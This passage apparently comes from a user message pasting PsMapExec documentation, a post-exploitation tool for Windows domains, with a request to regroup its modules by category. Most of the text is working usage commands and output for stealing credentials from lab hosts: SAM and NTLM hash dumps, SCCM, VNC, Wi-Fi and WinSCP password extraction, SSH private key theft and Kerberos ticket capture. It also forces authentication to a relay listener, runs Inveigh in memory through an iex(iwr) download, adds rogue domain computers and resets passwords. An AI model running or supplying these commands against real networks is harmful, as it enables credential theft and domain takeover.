- Hashcat-ready files for cracking.
- Split into:
  - Full NTDS dump.
  - Separate user and computer hash lists.
Client-Facing Findings
Suitable for inclusion in reports or assessments:
- Users with empty passwords (enabled and disabled).
- Users with empty passwords (enabled only).
- Users where the password matches the sAMAccountName (enabled and disabled).
- Users where the password matches the sAMAccountName (enabled only).
- Enabled users sharing identical passwords (password reuse across accounts).

> RDP

Enable or Disable RDP on the remote system

Optional Parameters

Parameter	Value	Description
-ShowOutput	N/A	Displays each targets output to the console
-SuccessOnly	N/A	Display only successful results
-Option	rdp:enable	Enables RDP on the remote system
-Option	rdp:disable	Disables RDP on the remote system

Usage

# Enable RDP on remote systems
PsMapExec [Method] -Targets [Targets] -Module RDP -Option "RDP:Enable"

# Disable RDP on remote systems
PsMapExec [Method] -Targets [Targets] -Module RDP -Option "RDP:Disable"

PS > PsMapExec wmi -Targets all -module rdp -Option rdp:disable

WMI   192.168.56.10   KINGSLANDING   SEVENKINGDOMS.LOCAL         Windows Server 2019 Datacenter Evaluation   [+] SUCCESS
The operation completed successfully.

WMI   192.168.56.21   THE-EYRIE      SEVENKINGDOMS.LOCAL         Windows Server 2019 Datacenter Evaluation   [+] SUCCESS
The operation completed successfully.

> NTLM

Note: Does not currently working against Windows Server 2008 / Windows 7 / Windows Server 2012

This module builds upon the SessionExec module. Whereby, execution on a remote host will force each user logon session to authenticate to a locally hosted web sever and obtain the users NTLMv1 or NTLMv2 hash.

This modules code is based on a fork of Get-NetNTLM.

If you wish to relay hashes or capture them with Inveigh or Responder, instead use the SessionRelay module.

For example, assuming the below output. We can see the remote host currently has the users standarduser and srv2019-admin within existing logon sessions. PsMapExec will attempt to obtain each users NTLMv1 or NTLMv2 hash.

C:\Users\SRV2019-Admin>quser
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 standarduser                              1  Disc            7  04/08/2024 17:14
 srv2019-admin         console             2  Active      none   04/08/2024 17:18

Output for NTLM is stored $PWD\PME\NTLM\

Optional Parameters

Parameter	Value	Description
-ShowOutput	N/A	Displays each targets output to the console
-SuccessOnly	N/A	Display only successful results

Usage

PsMapExec [Method] -Targets [Targets] -Module ntlm -ShowOutput

PS > PsMapExec wmi -Targets all -Module ntlm -ShowOutput

WMI   10.10.10.12     Security-CA.security.local    Windows Server 2019 Standard      [*] NO RESULTS
WMI   10.10.10.111    DC02.security.local           Windows Server 2019 Standard      [*] NO RESULTS
WMI   10.10.10.6      MSSQL02.security.local        Windows Server 2019 Standard      [+] SUCCESS

[*] Invoking Command as [User:administrator] [Session ID:1]

Administrator::MSSQL02:46ED092BE14DE3FF00000000000000000000000000000000:151D5DA5BBF70C3D2A6F8A7C2C5473E736B3F0E9DA0F5B9A
:1122334455667788

WMI   10.10.10.100    DC01.security.local           Windows Server 2022 Standard      [+] SUCCESS

[*] Invoking Command as [User:administrator] [Session ID:1]

Administrator::SECURITY:1122334455667788:CCD670E128260F9FE8F610915C24D211:0101000000000000272E21392DCADB0134E80284C92EBB
D9000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061
006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C
006F00630061006C00080030003000000000000000000000000030000013B772B7A0FA1926CDE3212F78A280C82E41321D016AD18D0B811E2169FA20
450A001000000000000000000000000000000000000900300048005400540050002F0044004300300031002E00730065006300750072006900740079
002E006C006F00630061006C000000000000000000

[*] Invoking Command as [User:moe] [Session ID:2]

Moe::SECURITY:1122334455667788:C0223697E5F206B9CBE817506D6EB194:0101000000000000439C823C2DCADB01EC3597FF5D556FE400000000
0200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300
280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F006300
61006C00080030003000000000000000010000000020000013B772B7A0FA1926CDE3212F78A280C82E41321D016AD18D0B811E2169FA20450A001000
000000000000000000000000000000000900300048005400540050002F0044004300300031002E00730065006300750072006900740079002E006C00
6F00630061006C000000000000000000

Parsing

This module's parsing output provides a high-level summary of which user hashes were captured on which systems, along with an indication of whether each hash is NTLMv1 or NTLMv2.

Parsing Results

-[DC01.security.local-NTLM]-

Obtained NTLMv2 hash for Administrator
Obtained NTLMv2 hash for Moe

-[MSSQL02.security.local-NTLM]-

Obtained NTLMv1 hash for Administrator

[*] Outputting all NTLMv2 results to C:\Users\moe\PME\NTLM\All-NTLMv2.txt
[*] Outputting all NTLMv1 results to C:\Users\moe\PME\NTLM\All-NTLMv1.txt
[!] You can check to see if the NTLMv1 password is known against https://shuck.sh/get-shucking.php

> SAM

Dumps SAM credentials for each target system using a heavily modified version of Invoke-NTLMExtract.ps1.

For each system output is stored in $pwd\PME\PME\SAM\

Optional Parameters

Parameter	Value	Description
-NoParse	N/A	Will omit parsing output from each system and checks for which SAM hashes are valid on multiple systems
-Rainbow	N/A	When provided, collected SAM hashes will be compared against an online database (ntlm.pw)
-ShowOutput	N/A	Displays each target's output to the console
-SuccessOnly	N/A	Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module SAM -ShowOutput

PS > PsMapExec winrm -Targets all -Module sam -ShowOutput

WinRM   10.10.10.111    DC02.security.local           Windows Server 2019 Standard      [+] SUCCESS
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::

WinRM   10.10.10.17     MSSQL01.security.local        Windows Server 2022 Standard      [+] SUCCESS
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
MSSQL_Admin:1000:aad3b435b51404eeaad3b435b51404ee:9bff06fe611486579fb74037890fda96:::

WinRM   10.10.10.12     Security-CA.security.local    Windows Server 2019 Standard      [+] SUCCESS
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::

WinRM   10.10.10.6      MSSQL02.security.local        Windows Server 2019 Standard      [+] SUCCESS
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
MSSQL_Admin:1000:aad3b435b51404eeaad3b435b51404ee:9bff06fe611486579fb74037890fda96:::

Parsing

PsMapExec parses the results from each system and presents them in a readable, digestible format. It identifies systems that are reusing SAM hashes and outputs all collected hashes in a hashcat-compatible format.

Each hash is prefixed with the system name it was extracted from, making identification easier without compromising hashcat compatibility.

------------------------- Hashes which are valid on multiple computers -------------------------

Computers: MSSQL01, MSSQL02
MSSQL_Admin:aad3b435b51404eeaad3b435b51404ee:9bff06fe611486579fb74037890fda96:::

Computers: MSSQL01, MSSQL02, Security-CA, SRV2012
Administrator:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::

Computers: DC01, DC02
Administrator:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::

------------------------------ All collected SAM Hashes ----------------------------------------

[DC01]Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
[DC02]Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
[MSSQL01]Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
[MSSQL01]MSSQL_Admin:1000:aad3b435b51404eeaad3b435b51404ee:9bff06fe611486579fb74037890fda96:::
[MSSQL02]Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
[MSSQL02]MSSQL_Admin:1000:aad3b435b51404eeaad3b435b51404ee:9bff06fe611486579fb74037890fda96:::
[Security-CA]Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
[SRV2012]Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::

------------------------------------------------------------------------------------------------

> SCCM

Dumps local SCCM secrets for Network Access Account credentials and Task sequence data. Collected information is automatically parsed and organized where it will be stored in $PWD\PME\SCCM\.

Optional Parameters

Parameter	Value	Description
-NoParse	N/A	Will omit parsing output from each system.
-ShowOutput	N/A	Displays each target's output to the console.
-SuccessOnly	N/A	Display only successful results.

Usage

PsMapExec [Method] -Targets [Targets] -Module sccm -ShowOutput

PS > PsMapExec WinRM -Targets sccm-distro -Module sccm -ShowOutput

WinRM   10.2.10.12      sccm-distro.ludus.domain   Windows Server 2022 Standard Evaluation   [+] SUCCESS

< -- Snip -- >

[+] Found 2 Network Access Account(s)
[+] Decrypting network access account credentials

    guidMasterKey    : {ea477cba-d82d-48e4-8ee2-d99a8740c7df}
    size             : 266
    flags            : 0x00000000
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      :
    guidMasterKey    : {ea477cba-d82d-48e4-8ee2-d99a8740c7df}
    size             : 250
    flags            : 0x00000000
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      :


    Network Access Username: ludus\sccm_naa_2
    Network Access Password: password123


    guidMasterKey    : {ea477cba-d82d-48e4-8ee2-d99a8740c7df}
    size             : 250
    flags            : 0x00000000
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      :
    guidMasterKey    : {ea477cba-d82d-48e4-8ee2-d99a8740c7df}
    size             : 250
    flags            : 0x00000000
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      :


    Network Access Username: ludus\sccm_naa
    Network Access Password: Password123


[+] Found 2 Task Sequence(s)
[+] Decrypting Task Sequences

    guidMasterKey    : {ea477cba-d82d-48e4-8ee2-d99a8740c7df}
    size             : 8042
    flags            : 0x00000000
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      :


[+]    Task Sequence:


<sequence version="3.10">
  <step type="SMS_TaskSequence_RunPowerShellScriptAction" name="Run PowerShell Script" description=""
runIn="WinPEandFullOS" successCodeList="0 3010" retryCount="0" runFromNet="false">
    <action>OSDRunPowerShellScript.exe</action>
    <defaultVarList>
      <variable name="OSDRunPowerShellScriptExecutionPolicy" property="ExecutionPolicy">AllSigned</variable>
      <variable name="OSDRunPowerShellScriptOutputVariableName" property="OutputVariableName">
      </variable>
      <variable name="OSDRunPowerShellScriptParameters" property="Parameters">
      </variable>
      <variable name="_SMSTSRunPowerShellAsUser" property="RunAsUser">false</variable>
      <variable name="OSDRunPowerShellScriptSourceScript" property="SourceScript">//4kA <--Snip --> </variable>
      <variable name="OSDRunPowerShellScriptSuccessCodes" property="SuccessCodes" hidden="true">0 3010</variable>
      <variable name="SMSTSRunPowerShellUserName" property="UserName">
      </variable>
      <variable name="SMSTSRunPowerShellWorkingDirectory" property="WorkingDirectory">
      </variable>
    </defaultVarList>
  </step>
  <step type="SMS_TaskSequence_RunCommandLineAction" name="Map Second Network Drive" description=""
runIn="WinPEandFullOS" successCodeList="0 3010" retryCount="0" runFromNet="false">
    <action>smsswd.exe /run: powershell.exe /c net use Z: \\fileserver\adminshare /user:DOMAIN\saccount
Str0ngPASSW0rd___{{"}}</action>
    <defaultVarList>
      <variable name="CommandLine" property="CommandLine" hidden="true">powershell.exe /c net use Z:
\\fileserver\adminshare /user:DOMAIN\saccount Str0ngPASSW0rd___{{"}}</variable>
      <variable name="SMSTSDisableWow64Redirection" property="DisableWow64Redirection">false</variable>
      <variable name="SMSTSRunCommandLineOutputVariableName" property="OutputVariableName">
      </variable>
      <variable name="_SMSTSRunCommandLineAsUser" property="RunAsUser">false</variable>
      <variable name="SuccessCodes" property="SuccessCodes" hidden="true">0 3010</variable>
    </defaultVarList>
  </step>
  <step type="SMS_TaskSequence_RunCommandLineAction" name="Map network drive" description="" runIn="WinPEandFullOS"
successCodeList="0 3010" retryCount="0" runFromNet="false">
    <action>smsswd.exe /run: cmd.exe /c net use Z: \\fileserver\adminshare /user:DOMAIN\saccount P@ssw0rd123!</action>
    <defaultVarList>
      <variable name="CommandLine" property="CommandLine" hidden="true">cmd.exe /c net use Z: \\fileserver\adminshare
/user:DOMAIN\saccount P@ssw0rd123!</variable>
      <variable name="SMSTSDisableWow64Redirection" property="DisableWow64Redirection">false</variable>
      <variable name="SMSTSRunCommandLineOutputVariableName" property="OutputVariableName">
      </variable>
      <variable name="_SMSTSRunCommandLineAsUser" property="RunAsUser">false</variable>
      <variable name="SuccessCodes" property="SuccessCodes" hidden="true">0 3010</variable>
    </defaultVarList>
  </step>
</sequence>


< -- Snip -->

Parsing

PsMapExec will attempt to automatically parse extracted data to give an overview of interesting snippets.

Parsing Results

-[sccm-distro.ludus.domain]-

Task Sequences
Directory Path  : C:\Users\domainadmin\PME\SCCM\sccm-distro.ludus.domain
Task Sequences  : Found 2 Task Sequences and saved to XML
Possible Creds  : TaskSequence_0.xml, TaskSequence_1.xml <--- check for creds!

Network Access Accounts
NAA File Path   : C:\Users\domainadmin\PME\SCCM\sccm-distro.ludus.domain\NAA-Credentials.txt
NAA Credentials : ludus\sccm_naa:Password123
NAA Credentials : ludus\sccm_naa_2:password123

> SessionExec

The SessionExec module is based on Leo4j's SessionExec, it uses a PowerShell port of the code Invoke-SessionExec.

This module will connect to the target system elevate to SYSETM and run a specified -command as each user on the system that exhibits a logon session.

For example, assuming the below output. We can see the remote host currently has the users moe and administrator with existing logon sessions. PsMapExec will execute a given command within each user context.

C:\Users\SRV2019-Admin>quser
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 standarduser                              1  Disc            7  04/08/2024 17:14
 srv2019-admin         console             2  Active      none   04/08/2024 17:18

Output for SessionExec is stored $PWD\PME\SCCM\.

Optional Parameters

Parameter	Value	Description
-Command	Command	The command to run as each user. If not specified, a simple "whoami" will be executed.
-ShowOutput	N/A	Displays each target's output to the console.
-SuccessOnly	N/A	Display only successful results.

Usage

PsMapExec [Method] -Targets [Targets] -Module SessionExec -ShowOutput

PS > PsMapExec winrm -Targets all -Module SessionExec -ShowOutput

WinRM   10.10.10.111    DC02.security.local           Windows Server 2019 Standard      [*] NO RESULTS
WinRM   10.10.10.17     MSSQL01.security.local        Windows Server 2022 Standard      [*] NO RESULTS
WinRM   10.10.10.6      MSSQL02.security.local        Windows Server 2019 Standard      [+] SUCCESS

[*] Invoking Command as [User:administrator] [Session ID:1]

security\administrator

WinRM   10.10.10.100    DC01.security.local           Windows Server 2022 Standard      [+] SUCCESS

[*] Invoking Command as [User:administrator] [Session ID:1]

security\administrator

[*] Invoking Command as [User:moe] [Session ID:2]

security\moe

> SessionRelay

Creates a cmd.exe process as each user logon session on the remote system and connects back to a non-existent share to the host specified by -ListenerIP. This can then be used with tools such as Inveigh or Responder to capture NTLMv2 hashes, or with ntlmrelayx to relay captured hashes.

For example, assuming the below output. We can see the remote host currently has the users standarduser and srv2019-admin within existing logon sessions. PsMapExec can force each one of these users to to connect to a non-existing share on a listener and we can capture their NTLMv1 or NTLMv2 hashes.

C:\Users\Administrator.SECURITY> quser
 
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 moe                                       2  Disc            .  21/05/2025 14:33
 administrator         console             3  Active      none   21/05/2025 17:50

Optional Parameters

Parameter	Value	Description
-ShowOutput	N/A	Displays each target's output to the console
-SuccessOnly	N/A	Display only successful results

Usage

Before using the module, ensure a listener (Inveigh, Ntlmrelayx, Responder) is running. The below example covers usage for capturing hashes with Inveigh.

# Load Inveigh into memory
iex (iwr -UseBasicParsing https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1)

# Execute Inveigh (as admin), ensuring to specify the current systems IP address
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y -IP 10.10.10.11

# Run PsMapExec, ensuring -ListenerIP is set to the same IP address as above.
PsMapExec [Method] -Targets [Targets] -Module SessionRelay -ListenerIP 10.10.10.11

PS > PsMapExec wmi -Targets MSSQL02 -Module SessionRelay -ShowOutput  -ListenerIP 10.10.10.11

[*] About to relay user Logon Sessions to the provided IP address [10.10.10.11]. Ensure Responder or Inveigh is running!

WMI   10.10.10.6      MSSQL02.security.local   Windows Server 2019 Standard   [+] SUCCESS

[+] Relaying as moe under Session ID:2
[+] Relaying as administrator under Session ID:3

WARNING: [!] Run Stop-Inveigh to stop
[*] Press any key to stop console output
[+] [2025-05-21T17:57:31] TCP(445) SYN packet detected from 10.10.10.6:50418
[+] [2025-05-21T17:57:31] SMB(445) negotiation request detected from 10.10.10.6:50418
[+] [2025-05-21T17:57:31] SMB(445) NTLM challenge CA043F45F218F5BF sent to 10.10.10.6:50418
[+] [2025-05-21T17:57:31] SMB(445) NTLMv2 captured for SECURITY\Moe from 10.10.10.6(MSSQL02):50418:

Moe::SECURITY:CA043F45F218F5BF:ABBD6A600858157ADC91747C338077F0:01010000000000002D3C4F7171CADB0171C3E <-- Snip -->

[+] [2025-05-21T17:57:32] SMB(445) NTLM challenge 089FF062A0ED001D sent to 10.10.10.6:50418
[+] [2025-05-21T17:57:32] SMB(445) NTLMv2 captured for SECURITY\Administrator from 10.10.10.6(MSSQL02):50418:

Administrator::SECURITY:089FF062A0ED001D:B6CEC6BD38A070CC23C2B3027F6A197A:010100000000000011DF587171C <-- Snip -->

> Snipped

Connects to the remote system and looks for screenshots taken using the snipping tool in each users pictures directory. Each image is then downloaded and transferred back to PsMapExec for review. Obtained images will be stored in $PWD\PME\Snipped\

Optional Parameters


-ShowOutput	N/A	Displays each targets output to the console
-SuccessOnly	N/A	Display only successful results

Usage Examples

PsMapExec [Method] -Targets [Targets] -Module Snipped

> SSH

Connects to the remote system and looks for SSH keys and known hosts within each user folder within .ssh Collected information is automatically parsed and organized where it will be stored in $PWD\PME\SSH\

Optional Parameters


-NoParse	N/A	Will ommit parsing output from each system.
-ShowOutput	N/A	Displays each targets output to the console
-SuccessOnly	N/A	Display only successful results

Usage Examples

PsMapExec [Method] -Targets [Targets] -Module SSH -ShowOutput

PS > PsMapExec wmi -Targets MSSQL02 -Module ssh -ShowOutput

WMI   10.10.10.6      MSSQL02.security.local   Windows Server 2019 Standard   [+] SUCCESS

[Key: C:\Users\Administrator.SECURITY\.ssh\id_ed25519]

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABD/1rHaDc
7PWp+GGHNM8ZfPAAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIFqduZMpGAsxlIgw
N47k9l1D6HsB9ovDRZFgFjLfL613AAAAsJPmNU06sq5L8HndGwu9BOL/YJdzUh7uUOFJQb
5NJPsgGVwEKZKv+5stupXvQM6tPaRjqWfSFMCBth12sdz8kvDmqn7y3EN45Ct6tpOAIjHD
Y9xEHUerd2ptK2e3kpvRx5036Np8PiQN/4xIpYLv4Jxqbmp0tAtZV8oQwyb8+WLe9QteMM
HBea5LQ9Po1dEw0pFLcqHGuMGwhEjER2jjy8TGAS9Q7weD3mEBHr5NdBeX
-----END OPENSSH PRIVATE KEY-----

[Public Key: C:\Users\Administrator.SECURITY\.ssh\id_ed25519.pub]

ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFqduZMpGAsxlIgwN47k9l1D6HsB9ovDRZFgFjLfL613 security\administrator@MSSQL02

[Known Hosts: C:\Users\Administrator.SECURITY\.ssh\known_hosts]

10.10.10.117
10.10.10.100

[Known Hosts: C:\Users\Administrator.SECURITY\.ssh\known_hosts.old]

10.10.10.100

> TGTDeleg

This module builds upon the SessionExec module. Whereby, execution on a remote host will perform a TGTDeleg operation from Rubeus under each user logon on the remote system.

For example, assuming the below output. We can see the remote host currently has the users moe, administrator and protected with existing logon sessions. PsMapExec will perform Rubeus' TGTDeleg command as each user and obtain a usable TGT.

C:\Users\Administrator.SECURITY> quser
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 moe                                       2  Disc           31  21/05/2025 14:33
 administrator                             3  Disc            .  21/05/2025 17:50
 protected             console             4  Active      none   21/05/2025 18:21

Output for TGTDeleg is stored $PWD\PME\TGTDeleg\.

Note: There are some limitations with this module. It is not possible to use TGTDeleg to obtain a useable TGT for a user if they are a member of the "Protected Users" group of if they have the flag "This account is sensitive and cant be delegated" enabled.

Optional Parameters

Parameter	Value	Description
-NoParse	N/A	If specified, PsMapExec will not parse the ticket output.
-ShowOutput	N/A	Displays each target's output to the console
-SuccessOnly	N/A	Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module TGTDeleg

PS > PsMapExec winrm -Targets servers -Module tgtdeleg -ShowOutput

WinRM   10.10.10.5      SRV2012.security.local       Windows Server 2012 R2 Standard   [*] NO RESULTS
WinRM   10.10.10.12     Security-CA.security.local   Windows Server 2019 Standard      [*] NO RESULTS
WinRM   10.10.10.111    DC02.security.local          Windows Server 2019 Standard      [*] NO RESULTS
WinRM   10.10.10.17     MSSQL01.security.local       Windows Server 2022 Standard      [+] SUCCESS

[*] Invoking Command as [User:administrator] [Session ID:1]
[-] Local user account, skipping...

WinRM   10.10.10.6      MSSQL02.security.local       Windows Server 2019 Standard      [+] SUCCESS

[*] Invoking Command as [User:moe] [Session ID:2]

doIFfDCCBXigAwIBBaEDAgEWooIEgDCCBHxhggR4MIIEdKADAgEFoRAbDlNFQ1VSSVRZLkxPQ0FMoiMwIaADAgECoRowGBsGa3JidGd0Gw5TRUNVUklUWS5M
T0NBTKOCBDQwggQwoAMCARKhAwIBAqKCBCIEggQeK1WoMnfe6ICKWxPrHsjRAb85G15r4D1V36kHReWjSWWfX1qD7eahPAKN/q5INFHA7DpNxx1CtPLJRUHV
<-- Snip -->

[*] Invoking Command as [User:administrator] [Session ID:3]

doIF+DCCBfSgAwIBBaEDAgEWooIE8jCCBO5hggTqMIIE5qADAgEFoRAbDlNFQ1VSSVRZLkxPQ0FMoiMwIaADAgECoRowGBsGa3JidGd0Gw5TRUNVUklUWS5M
T0NBTKOCBKYwggSioAMCARKhAwIBAqKCBJQEggSQXXpMHEymBODNn5+2qp+LXrhK1bsaHeEh/YGDtzzloaPtzWoRMgiFjc6F22Zw9OYhQlld61dmx/27FAig
<-- Snip -->

[*] Invoking Command as [User:protected] [Session ID:4]

Note: The above user "protected" is a member of the protected users group and as such, it is not possible to obtain a TGT with TGTDeleg.

Parsing

PsMapExec will parse the results from each system and present the results in a digestible and readable format. The notes field will highlight in yellow any interesting information about each result. Additionally, the output will generate easy one liner commands to run to impersonate the user.

The table below shows the possible values for the notes field.

Value	Description
AdminCount=1	Identifies an account that may hold privileged permissions within the domain
Domain Admin, Enterprise Admin, Server Operator, Account Operator	The account is a member of one of these privileged groups

> VNC

Description

This module searches for VNC passwords stored in the registry and configuration files for various VNC implementations, including RealVNC, TightVNC, TigerVNC, and UltraVNC. The module identifies and decrypts these passwords using the DES algorithm with a fixed key. It covers the following VNC implementations:

RealVNC: Searches the registry for VNC server proxy credentials.
TightVNC: Searches the registry for server passwords, control passwords, and view-only passwords.
TigerVNC: Searches the registry for server passwords.
UltraVNC: Searches for passwords in configuration files located in specified directories.

For each system output is stored in $pwd\PME\PME\VNC\

Optional Parameters

Parameter	Value	Description
-ShowOutput	N/A	Displays each target's output to the console
-SuccessOnly	N/A	Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module VNC -ShowOutput

PS > PsMapExec winrm -Targets servers -Module vnc -ShowOutput

WinRM   10.10.10.100    DC01.security.local          Windows Server 2022 Standard      [*] NO RESULTS
WinRM   10.10.10.12     Security-CA.security.local   Windows Server 2019 Standard      [*] NO RESULTS
WinRM   10.10.10.6      MSSQL02.security.local       Windows Server 2019 Standard      [+] SUCCESS

[TightVNC]
========================================
Encrypted Password : 72AC5E4A13275F4B
Decrypted Password : Pass123
Encrypted Password : F46AAD6037EE12AB
Decrypted Password : Pass121
========================================


WinRM   10.10.10.17     MSSQL01.security.local       Windows Server 2022 Standard      [*] NO RESULTS
WinRM   10.10.10.111    DC02.security.local          Windows Server 2019 Standard      [+] SUCCESS

[UltraVNC]
========================================
Encrypted Password : B2CE129D0B6C0C7325
Decrypted Password : Pass001 
Encrypted Password : 92D91A9BA025BC22C3
Decrypted Password : ViewPass
========================================

> Wi-Fi

Identifies Wi-Fi connection credentials on the target

For each system output is stored in $pwd\PME\PME\Wi-Fi\

Optional Parameters

Parameter	Value	Description
-ShowOutput	N/A	Displays each target's output to the console
-SuccessOnly	N/A	Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module WiFi -ShowOutput

PS > PsMapExec smb-Targets servers -Module wifi -ShowOutput

SMB   10.10.10.100    DC01.security.local          Windows Server 2022 Standard      [*] NO RESULTS
SMB   10.10.10.12     Security-CA.security.local   Windows Server 2019 Standard      [*] NO RESULTS
SMB   10.10.10.6      MSSQL02.security.local       Windows Server 2019 Standard      [+] SUCCESS

PROFILE_NAME      PASSWORD
-------------      --------
HomeNetwork        myhomewifi123
OfficeWiFi         SecurePass!2023
CafeFreeWiFi       password123

> WinSCP

This module iterates through the registry and identifies WinSCP session information, attempts to decrypt it and shows the plaintext session information.

For each system output is stored in $pwd\PME\PME\WinSCP\

Optional Parameters

Parameter	Value	Description
-ShowOutput	N/A	Displays each target's output to the console
-SuccessOnly	N/A	Display only successful results

Usage

# Standard execution
PsMapExec [Method] -Targets [Targets] -Module WinSCP -ShowOutput

PS > PsMapExec winrm -Targets servers -Module winscp -ShowOutput

WinRM   10.10.10.12     Security-CA.security.local   Windows Server 2019 Standard      [*] NO RESULTS
WinRM   10.10.10.17     MSSQL01.security.local       Windows Server 2022 Standard      [*] NO RESULTS
WinRM   10.10.10.111    DC02.security.local          Windows Server 2019 Standard      [*] NO RESULTS
WinRM   10.10.10.6      MSSQL02.security.local       Windows Server 2019 Standard      [+] SUCCESS

User              Session                               Hostname         Username             Password                  

----              -------                               --------         --------             --------                  
MSSQL02\protected [email protected] s3.amazonaws.com AKIAIOSFODNN7EXAMPLE wJalrXUtnFEMI/K7MDENG/b...


User              Session               Hostname     Username Password   
----              -------               --------     -------- --------   
MSSQL02\protected [email protected] secure.local scp_user Passw0rd111

I got this markdown file. I have tried to list the module headers alphabetically, but could really do with grouping these modules together by category then alphabeitcally within.

For example, AddSPN and RemoveSPN and ToggleAccount would be under "User Modification"

> LDAP / LDAPS

The following modules below are all exclusive to the LDAP or LDAPS method within PsMapExec.

PsMapExec LDAP -Targets [Targets] -Module [Module]
PsMapExec LDAPS -Targets [Targets] -Module [Module]

Account Management

AddComputer

Adds a new computer account to the domain

PsMapExec LDAP -Targets [Targets] -domain [Domain] -Module AddComputer

PS > PsMapExec ldap -Targets DC01 -Module addcomputer

LDAP   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

[*] Added Computer to security.local! 

[*] Name     : Evil_yJbI 
[*] Pass     : l8aTPjULv4QIdKMW 
[*] DN       : CN=Evil_yJbI,CN=Computers,DC=security,DC=local

RemoveComputer

Removes the specified computer account from the domain

PsMapExec LDAP -Targets [Targets] -domain [Domain] -TargetDN [TargetDN] -Module RemoveComputer

PS > PsMapExec ldap -Targets DC01 -Module RemoveComputer -TargetDN "CN=Evil_fsBk,CN=Computers,DC=security,DC=local"

LDAP   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

[*] Successfully removed "CN=Evil_fsBk,CN=Computers,DC=security,DC=local" from the domain.

ResetPassword

Resets the password of the account to a random value

PsMapExec LDAP -Targets [Targets] -domain [Domain] -TargetDN [TargetDN] -Module ResetPassword

PS > PsMapExec ldap -Targets DC01 -Module ResetPassword -TargetDN "CN=Moe,CN=Users,DC=SECURITY,DC=LOCAL"

LDAP   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

[*] Successfully reset "CN=Moe,CN=Users,DC=SECURITY,DC=LOCAL" password to qupaI4fV1Y3BHeXd

ToggleAccount

Enables / Disabled the specified user or computer account

PsMapExec LDAP -Targets [Targets] -domain [Domain] -Module ToggleAccount -TargetDN [TargetDN]

PS > PsMapExec ldap -Targets DC01 -Module ToggleAccount -TargetDN "CN=Moe,CN=Users,DC=SECURITY,DC=LOCAL"

LDAP   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

[*] Disabled Account CN=Moe,CN=Users,DC=SECURITY,DC=LOCAL

PS > PsMapExec ldap -Targets DC01 -Module ToggleAccount -TargetDN "CN=Moe,CN=Users,DC=SECURITY,DC=LOCAL"

LDAP   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

[*] Enabled Account CN=Moe,CN=Users,DC=SECURITY,DC=LOCAL

Group Management

AddToGroup

Adds a specified object to a group

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -GroupDN [GroupDN] -TargetDN [TargetDN] -Module AddToGroup

PS > PsMapExec ldap -Targets DC01 -Module AddToGroup -GroupDN "CN=Spicy_Admins,CN=Users,DC=SECURITY,DC=LOCAL" -TargetDN "CN=Moe,CN=Users,DC=SECURITY,DC=LOCAL"

LDAP   10.10.10.100    DC01.security.local   Windows Server 2022 Standard   [+] SUCCESS

[*] Successfully added CN=Moe,CN=Users,DC=SECURITY,DC=LOCAL to CN=Spicy_Admins,CN=Users,DC=SECURITY,DC=LOCAL

RemoveFromGroup

Removes a specified object from a group

PsMapExec LDAP -Targets [Targets] -Domain [Domain] -GroupDN [GroupDN] -TargetDN [TargetDN] -Module RemoveFromGroup

